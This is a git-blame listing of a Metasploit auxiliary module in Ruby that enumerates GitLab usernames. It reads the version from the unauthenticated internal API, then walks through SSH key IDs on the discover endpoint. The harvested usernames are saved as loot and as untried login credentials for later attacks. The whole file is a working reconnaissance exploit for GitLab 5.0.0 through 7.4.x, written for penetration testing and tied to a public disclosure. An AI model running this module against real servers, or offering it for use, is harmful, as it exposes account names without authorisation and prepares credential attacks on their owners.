2014-08-17 04:39:12 +00:00
|
|
|
##
|
2015-03-20 17:27:23 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2014-08-17 04:39:12 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'rex/proto/http'
|
|
|
|
require 'msf/core'
|
|
|
|
require 'json'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
include Msf::Auxiliary::Scanner
|
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
|
|
|
|
def initialize(info = {})
|
2014-12-15 17:20:23 +00:00
|
|
|
super(update_info(
|
|
|
|
info,
|
2015-03-20 22:26:21 +00:00
|
|
|
'Name' => 'GitLab User Enumeration',
|
|
|
|
'Description' => "
|
2015-03-17 11:33:57 +00:00
|
|
|
The GitLab 'internal' API is exposed unauthenticated on GitLab. This
|
2014-08-17 04:39:12 +00:00
|
|
|
allows the username for each SSH Key ID number to be retrieved. Users
|
2014-12-15 17:20:23 +00:00
|
|
|
who do not have an SSH Key cannot be enumerated in this fashion. LDAP
|
2015-03-17 10:03:32 +00:00
|
|
|
users, e.g. Active Directory users will also be returned. This issue
|
2015-03-17 11:33:57 +00:00
|
|
|
was fixed in GitLab v7.5.0 and is present from GitLab v5.0.0.
|
2014-12-15 17:20:23 +00:00
|
|
|
",
|
2015-03-20 22:26:21 +00:00
|
|
|
'Author' => 'Ben Campbell',
|
|
|
|
'License' => MSF_LICENSE,
|
2015-03-20 19:17:34 +00:00
|
|
|
'DisclosureDate' => 'Nov 21 2014',
|
2015-03-20 22:26:21 +00:00
|
|
|
'References' =>
|
2015-03-20 19:17:34 +00:00
|
|
|
[
|
2015-03-20 22:26:21 +00:00
|
|
|
['URL', 'https://labs.mwrinfosecurity.com/blog/2015/03/20/gitlab-user-enumeration/']
|
2015-03-20 19:17:34 +00:00
|
|
|
]
|
2014-12-15 17:20:23 +00:00
|
|
|
))
|
2014-08-17 04:39:12 +00:00
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
2015-03-17 11:33:57 +00:00
|
|
|
OptString.new('TARGETURI', [ true, 'Path to GitLab instance', '/']),
|
2014-08-17 04:39:12 +00:00
|
|
|
OptInt.new('START_ID', [true, 'ID number to start from', 0]),
|
|
|
|
OptInt.new('END_ID', [true, 'ID number to enumerate up to', 50])
|
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def run_host(_ip)
|
2015-03-17 10:03:32 +00:00
|
|
|
internal_api = '/api/v3/internal'
|
2014-08-17 04:39:12 +00:00
|
|
|
check = normalize_uri(target_uri.path, internal_api, 'check')
|
|
|
|
|
2015-03-17 11:33:57 +00:00
|
|
|
print_status('Sending GitLab version request...')
|
2014-08-17 04:39:12 +00:00
|
|
|
res = send_request_cgi(
|
|
|
|
'uri' => check
|
|
|
|
)
|
|
|
|
|
|
|
|
if res && res.code == 200 && res.body
|
2015-03-20 17:27:02 +00:00
|
|
|
begin
|
|
|
|
version = JSON.parse(res.body)
|
|
|
|
rescue JSON::ParserError
|
|
|
|
fail_with(Failure::Unknown, 'Failed to parse banner version from JSON')
|
|
|
|
end
|
|
|
|
|
2014-08-17 04:39:12 +00:00
|
|
|
git_version = version['gitlab_version']
|
|
|
|
git_revision = version['gitlab_rev']
|
|
|
|
print_good("GitLab version: #{git_version} revision: #{git_revision}")
|
|
|
|
|
2015-03-17 10:03:32 +00:00
|
|
|
service = report_service(
|
2014-08-17 04:39:12 +00:00
|
|
|
host: rhost,
|
|
|
|
port: rport,
|
|
|
|
name: (ssl ? 'https' : 'http'),
|
|
|
|
proto: 'tcp'
|
|
|
|
)
|
|
|
|
|
|
|
|
report_web_site(
|
|
|
|
host: rhost,
|
|
|
|
port: rport,
|
|
|
|
ssl: ssl,
|
2015-03-17 11:33:57 +00:00
|
|
|
info: "GitLab Version - #{git_version}"
|
2014-08-17 04:39:12 +00:00
|
|
|
)
|
2014-12-15 17:44:24 +00:00
|
|
|
elsif res && res.code == 401
|
2015-03-17 11:33:57 +00:00
|
|
|
fail_with(Failure::NotVulnerable, 'Unable to retrieve GitLab version...')
|
2014-12-15 18:13:22 +00:00
|
|
|
else
|
2015-03-17 11:33:57 +00:00
|
|
|
fail_with(Failure::Unknown, 'Unable to retrieve GitLab version...')
|
2014-12-15 17:20:23 +00:00
|
|
|
end
|
|
|
|
|
2014-08-17 04:39:12 +00:00
|
|
|
discover = normalize_uri(target_uri.path, internal_api, 'discover')
|
|
|
|
|
2015-03-17 09:55:28 +00:00
|
|
|
users = ''
|
2014-08-17 04:39:12 +00:00
|
|
|
print_status("Enumerating user keys #{datastore['START_ID']}-#{datastore['END_ID']}...")
|
|
|
|
datastore['START_ID'].upto(datastore['END_ID']) do |id|
|
|
|
|
res = send_request_cgi(
|
|
|
|
'uri' => discover,
|
|
|
|
'method' => 'GET',
|
|
|
|
'vars_get' => { 'key_id' => id }
|
|
|
|
)
|
|
|
|
|
2014-12-15 18:13:22 +00:00
|
|
|
if res && res.code == 200 && res.body
|
2014-08-17 04:39:12 +00:00
|
|
|
begin
|
|
|
|
user = JSON.parse(res.body)
|
2015-03-17 09:55:28 +00:00
|
|
|
username = user['username']
|
|
|
|
unless username.nil? || username.to_s.empty?
|
|
|
|
print_good("Key-ID: #{id} Username: #{username} Name: #{user['name']}")
|
|
|
|
store_username(username, res)
|
|
|
|
users << "#{username}\n"
|
|
|
|
end
|
2014-08-17 04:39:12 +00:00
|
|
|
rescue JSON::ParserError
|
|
|
|
print_error("Key-ID: #{id} - Unexpected response body: #{res.body}")
|
|
|
|
end
|
|
|
|
elsif res
|
|
|
|
vprint_status("Key-ID: #{id} not found")
|
|
|
|
else
|
|
|
|
print_error('Connection timed out...')
|
|
|
|
end
|
|
|
|
end
|
2015-03-17 09:55:28 +00:00
|
|
|
|
|
|
|
unless users.nil? || users.to_s.empty?
|
2015-03-17 10:03:32 +00:00
|
|
|
store_userlist(users, service)
|
2015-03-17 09:55:28 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
2015-03-17 10:03:32 +00:00
|
|
|
def store_userlist(users, service)
|
2015-03-17 11:33:57 +00:00
|
|
|
loot = store_loot('gitlab.users', 'text/plain', rhost, users, nil, 'GitLab Users', service)
|
2015-03-17 09:55:28 +00:00
|
|
|
print_good("Userlist stored at #{loot}")
|
2014-08-17 04:39:12 +00:00
|
|
|
end
|
2014-12-15 17:20:23 +00:00
|
|
|
|
2014-12-15 18:13:22 +00:00
|
|
|
def store_username(username, res)
|
|
|
|
service = ssl ? 'https' : 'http'
|
|
|
|
service_data = {
|
|
|
|
address: rhost,
|
|
|
|
port: rport,
|
|
|
|
service_name: service,
|
|
|
|
protocol: 'tcp',
|
|
|
|
workspace_id: myworkspace_id,
|
|
|
|
proof: res
|
|
|
|
}
|
|
|
|
|
|
|
|
credential_data = {
|
|
|
|
origin_type: :service,
|
|
|
|
module_fullname: fullname,
|
|
|
|
username: username
|
|
|
|
}
|
|
|
|
|
|
|
|
credential_data.merge!(service_data)
|
|
|
|
|
|
|
|
# Create the Metasploit::Credential::Core object
|
|
|
|
credential_core = create_credential(credential_data)
|
|
|
|
|
|
|
|
# Assemble the options hash for creating the Metasploit::Credential::Login object
|
|
|
|
login_data = {
|
|
|
|
core: credential_core,
|
|
|
|
status: Metasploit::Model::Login::Status::UNTRIED
|
|
|
|
}
|
|
|
|
|
|
|
|
# Merge in the service data and create our Login
|
|
|
|
login_data.merge!(service_data)
|
|
|
|
create_credential_login(login_data)
|
|
|
|
end
|
|
|
|
end
|